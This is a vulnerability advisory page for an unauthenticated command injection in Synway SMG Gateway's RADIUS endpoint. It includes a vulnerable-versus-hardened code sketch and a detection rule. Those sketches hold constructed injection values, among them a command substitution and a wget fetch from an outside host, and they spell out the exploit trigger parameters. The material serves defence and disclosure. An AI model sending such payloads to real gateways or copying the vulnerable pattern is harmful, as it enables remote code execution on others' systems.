CVE-2025-71284
Published 2026-04-30
Priority P189 · critical · CVSS 3.1: 9.8
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
ITW: VulnCheck KEV (exploited in the wild)
EPSS: 5.73% (92.1st percentile)
Synway SMG Gateway Management Software contains an OS command injection vulnerability in the RADIUS configuration endpoint at /en/9-2radius.php where the radius_address POST parameter is split and interpolated directly into a sed command without sanitization. An unauthenticated remote attacker can inject arbitrary shell commands by submitting a POST request with crafted radius_address, radius_address2, shared_secret2, source_ip, timeout, or retry parameters along with save=1 and enable_radius=1 to achieve remote code execution. Exploitation evidence was first observed by the Shadowserver Foundation on 2025-07-11 (UTC).
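The advisory describes the flaw only in outline: a POST field is split and interpolated into a sed command line that a shell executes. The sketch below is an added example, not Synway's code; the gateway's real sed invocation is not published, so the vulnerable shape (split radius_address on ":" into host and port, interpolate both into a double-quoted sed -i expression handed to a shell), the config path and the config key names are assumptions. It puts the flawed builder next to two hardened forms: an argv-list sed call fed only validated values, and the preferable option of writing the config file directly so no external command ever sees request input. The payload is constructed.

```python
"""Vulnerable-vs-hardened sketch of a /en/9-2radius.php-style save handler.

Added example, not Synway's code. The vulnerable shape (split radius_address
on ':', interpolate host/port into a sed -i command line run by a shell), the
config path and the key names are assumptions built from the advisory text.
"""
import ipaddress
import re

CONFIG_FILE = "/etc/radius.conf"   # assumed path, illustrative only
DEFAULT_PORT = 1812


# --- vulnerable pattern: shell string built from a request parameter ----------
def build_sed_command_vulnerable(radius_address: str) -> str:
    """Returns the line the flawed handler would hand to system()/popen().
    Nothing is executed here; the point is what ends up in the string. Inside
    the double quotes a shell still expands $(...) and backticks before sed runs."""
    host, _, port = radius_address.partition(":")
    port = port or str(DEFAULT_PORT)
    return (f'sed -i "s/^server=.*/server={host}/; s/^port=.*/port={port}/" '
            f'{CONFIG_FILE}')


# --- hardened handling: validate to a strict grammar, never touch a shell ------
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME = re.compile(rf"^(?=.{{1,253}}$){_LABEL}(?:\.{_LABEL})*$")


def parse_radius_address(value: str) -> tuple[str, int]:
    """Accept 'host' or 'host:port' with host an IPv4 literal or a DNS name
    (IPv6 literals are out of scope here). Shell and sed metacharacters cannot
    survive because the accepted grammar does not contain them."""
    fields = value.split(":")
    if len(fields) > 2:
        raise ValueError("expected host or host:port")
    host = fields[0]
    port_s = fields[1] if len(fields) == 2 else str(DEFAULT_PORT)
    try:
        ipaddress.IPv4Address(host)
    except ValueError:
        if not _HOSTNAME.match(host):
            raise ValueError(f"invalid RADIUS host: {host!r}")
    if not port_s.isdigit() or not 1 <= int(port_s) <= 65535:
        raise ValueError(f"invalid port: {port_s!r}")
    return host, int(port_s)


def parse_bounded_int(value: str, name: str, lo: int, hi: int) -> int:
    """timeout/retry are integers; anything else is rejected, not quoted."""
    if not value.isdigit() or not lo <= int(value) <= hi:
        raise ValueError(f"{name} must be an integer in [{lo}, {hi}]")
    return int(value)


def build_sed_argv_hardened(radius_address: str) -> list[str]:
    """If sed must stay, pass an argv list (no shell parses it) built only from
    validated values. The hostname grammar also excludes '/', '&', '\\' and
    newline, which are special inside a sed replacement even without a shell."""
    host, port = parse_radius_address(radius_address)
    return ["sed", "-i",
            f"s/^server=.*/server={host}/; s/^port=.*/port={port}/",
            CONFIG_FILE]


def render_radius_config(form: dict[str, str]) -> str:
    """Preferred fix: validate every field and render the file in-process, so
    no external command sees user input. A shared secret may legitimately hold
    punctuation, so it is never run through sed; only line breaks are refused."""
    host, port = parse_radius_address(form["radius_address"])
    source_ip = str(ipaddress.IPv4Address(form.get("source_ip", "0.0.0.0")))
    timeout = parse_bounded_int(form.get("timeout", "3"), "timeout", 1, 60)
    retry = parse_bounded_int(form.get("retry", "3"), "retry", 0, 10)
    secret = form["shared_secret2"]
    if not secret or "\n" in secret or "\r" in secret:
        raise ValueError("shared secret must be a single non-empty line")
    return (f"server={host}\nport={port}\nsource_ip={source_ip}\n"
            f"timeout={timeout}\nretry={retry}\nsecret={secret}\n")


if __name__ == "__main__":
    payload = "10.0.0.1$(id)"   # constructed: address field carrying a command substitution
    print("vulnerable handler would run:", build_sed_command_vulnerable(payload))
    try:
        build_sed_argv_hardened(payload)
    except ValueError as err:
        print("hardened handler rejects it:", err)
    print(build_sed_argv_hardened("radius.example.net:1812"))
```

Two points the advisory's parameter list forces: timeout and retry are injectable too, so "only the address needs checking" is the wrong lesson, and shared_secret2 cannot be whitelisted down to alphanumerics without breaking real secrets, which is why the secret never goes near a command line at all.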
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| synway_information_engineering_co_ltd | synway_smg_gateway_management_software | — | — |
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| NVD | 4.0 | 9.3 | CRITICAL | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X |
| VulnCheck | n/a | 9.3 | CRITICAL | n/a |
VulDB
vuldb · 2026-04-30 · CVSS 9.3
CVE-2025-71284 [CRITICAL] Synway SMG Gateway Management Software 2025-07-11 RADIUS Configuration Endpoint /en/9-2radius.php OS command injection
A vulnerability, which was classified as critical, has been found in Synway SMG Gateway Management Software 2025-07-11. The affected element is an unknown function of the file /en/9-2radius.php of the component RADIUS Configuration Endpoint. Manipulation of the argument radius_address/radius_address2/shared_secret2/source_ip/timeout/retry results in OS command injection.
This vulnerability was named CVE-2025-71284. The attack may be initiated remotely. There is no available exploit.
GHSA
ghsa_unreviewed · 2026-04-30 · CWE-78
GHSA-8mvw-jrmp-qqqj (CVE-2025-71284) [CRITICAL]: Synway SMG Gateway Management Software contains an OS command injection vulnerability in the RADIUS configuration endpoint at /en/9-2radius.php
VulnCheck
vulncheck · 2025 · CVSS 9.3
CVE-2025-71284 [CRITICAL] CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Required Action: Apply remediations or mitigations per vendor instructions or di
No detection rules found.
No public exploits indexed.
No writeups or analysis indexed.
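With no detection rule indexed, the following is an added example of what one would look like, written here and not taken from VulnCheck, the Nuclei template or the vendor. It assumes request bodies are available (a reverse proxy, WAF or packet capture in front of the gateway); plain access logs usually carry only the request line, so body matching cannot run on them. It flags the advisory's trigger shape (POST to /en/9-2radius.php with save=1 and enable_radius=1 and shell metacharacters in any of the six listed parameters) and, because the endpoint is unauthenticated, also a clean config write from outside an assumed management network. The request records and the 10.10.0.0/24 management range are constructed for the example.

```python
"""Detection sketch for exploitation attempts against /en/9-2radius.php.

Added example, not a VulnCheck or vendor rule. Assumes request bodies are
visible (proxy/WAF/pcap). The request records and ADMIN_NETS are constructed.
"""
import ipaddress
import re
from urllib.parse import parse_qs

TARGET_PATH = "/en/9-2radius.php"
INJECTABLE = {"radius_address", "radius_address2", "shared_secret2",
              "source_ip", "timeout", "retry"}
# shell-relevant characters: separators, substitution, redirection, quotes, newline
SHELL_META = re.compile(r"[;&|`$()<>\\\"'\n\r]")
ADMIN_NETS = [ipaddress.ip_network("10.10.0.0/24")]   # assumed management range

CONSTRUCTED_REQUESTS = [
    # benign admin save from the management network
    {"src": "10.10.0.5", "method": "POST", "path": TARGET_PATH,
     "body": "save=1&enable_radius=1&radius_address=10.10.0.20:1812"
             "&shared_secret2=abc123&timeout=3&retry=2"},
    # exploit shape from the advisory: save=1, enable_radius=1, payload in radius_address
    {"src": "203.0.113.7", "method": "POST", "path": TARGET_PATH,
     "body": "save=1&enable_radius=1&radius_address=1.1.1.1%60id%60"
             "&shared_secret2=x&timeout=3&retry=1"},
    # payload in timeout, a field one might not expect to reach a shell
    {"src": "203.0.113.9", "method": "POST", "path": TARGET_PATH,
     "body": "save=1&enable_radius=1&radius_address=1.1.1.1"
             "&timeout=3%3Bwget+http%3A%2F%2F203.0.113.9%2Fx&retry=1"},
    # GET of the same page renders the form; not a write
    {"src": "203.0.113.7", "method": "GET", "path": TARGET_PATH, "body": ""},
    # a different page: out of scope for this rule
    {"src": "203.0.113.7", "method": "POST", "path": "/en/login.php",
     "body": "user=a&pass=b"},
]


def from_admin_net(src: str) -> bool:
    return any(ipaddress.ip_address(src) in net for net in ADMIN_NETS)


def classify(req: dict) -> tuple[str, list[str]]:
    """Return (verdict, reasons); verdict is attack, suspect, benign or ignore."""
    if req["method"] != "POST" or req["path"] != TARGET_PATH:
        return "ignore", []
    form = {k: v[0] for k, v in
            parse_qs(req["body"], keep_blank_values=True).items()}
    is_save = form.get("save") == "1" and form.get("enable_radius") == "1"
    reasons = [f"shell metacharacter in {name}={form[name]!r}"
               for name in sorted(INJECTABLE & set(form))
               if SHELL_META.search(form[name])]
    if reasons:
        # the advisory's trigger needs save=1 and enable_radius=1; the same
        # payload without them is still worth a look but is not the known shape
        return ("attack" if is_save else "suspect"), reasons
    if is_save and not from_admin_net(req["src"]):
        return "suspect", [f"unauthenticated RADIUS config write from {req['src']}"]
    return "benign", []


def scan(requests: list[dict]) -> list[tuple[str, str, list[str]]]:
    """Classify every record; returns (source, verdict, reasons) per request."""
    return [(r["src"], *classify(r)) for r in requests]


if __name__ == "__main__":
    for src, verdict, why in scan(CONSTRUCTED_REQUESTS):
        print(f"{src:15} {verdict:8} {'; '.join(why)}")
```

The metacharacter set is deliberately broad: a false positive on this endpoint is a RADIUS server named with a stray quote, which an administrator can explain, while a miss is unauthenticated code execution on a voice gateway. Tune the management range to the real network before relying on the "suspect" verdict.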
References
- https://github.com/projectdiscovery/nuclei-templates/blob/main/http/vulnerabilities/synway/synwaysmg-radius-rce.yaml
- https://mp.weixin.qq.com/s/PyepoFSuQ63E3RnpQa9nsA
- https://mrxn.net/jswz/synway-9-2radius-rce.html
- https://www.synway.net/
- https://www.vulncheck.com/advisories/synway-smg-gateway-management-software-os-command-injection-via-radius-address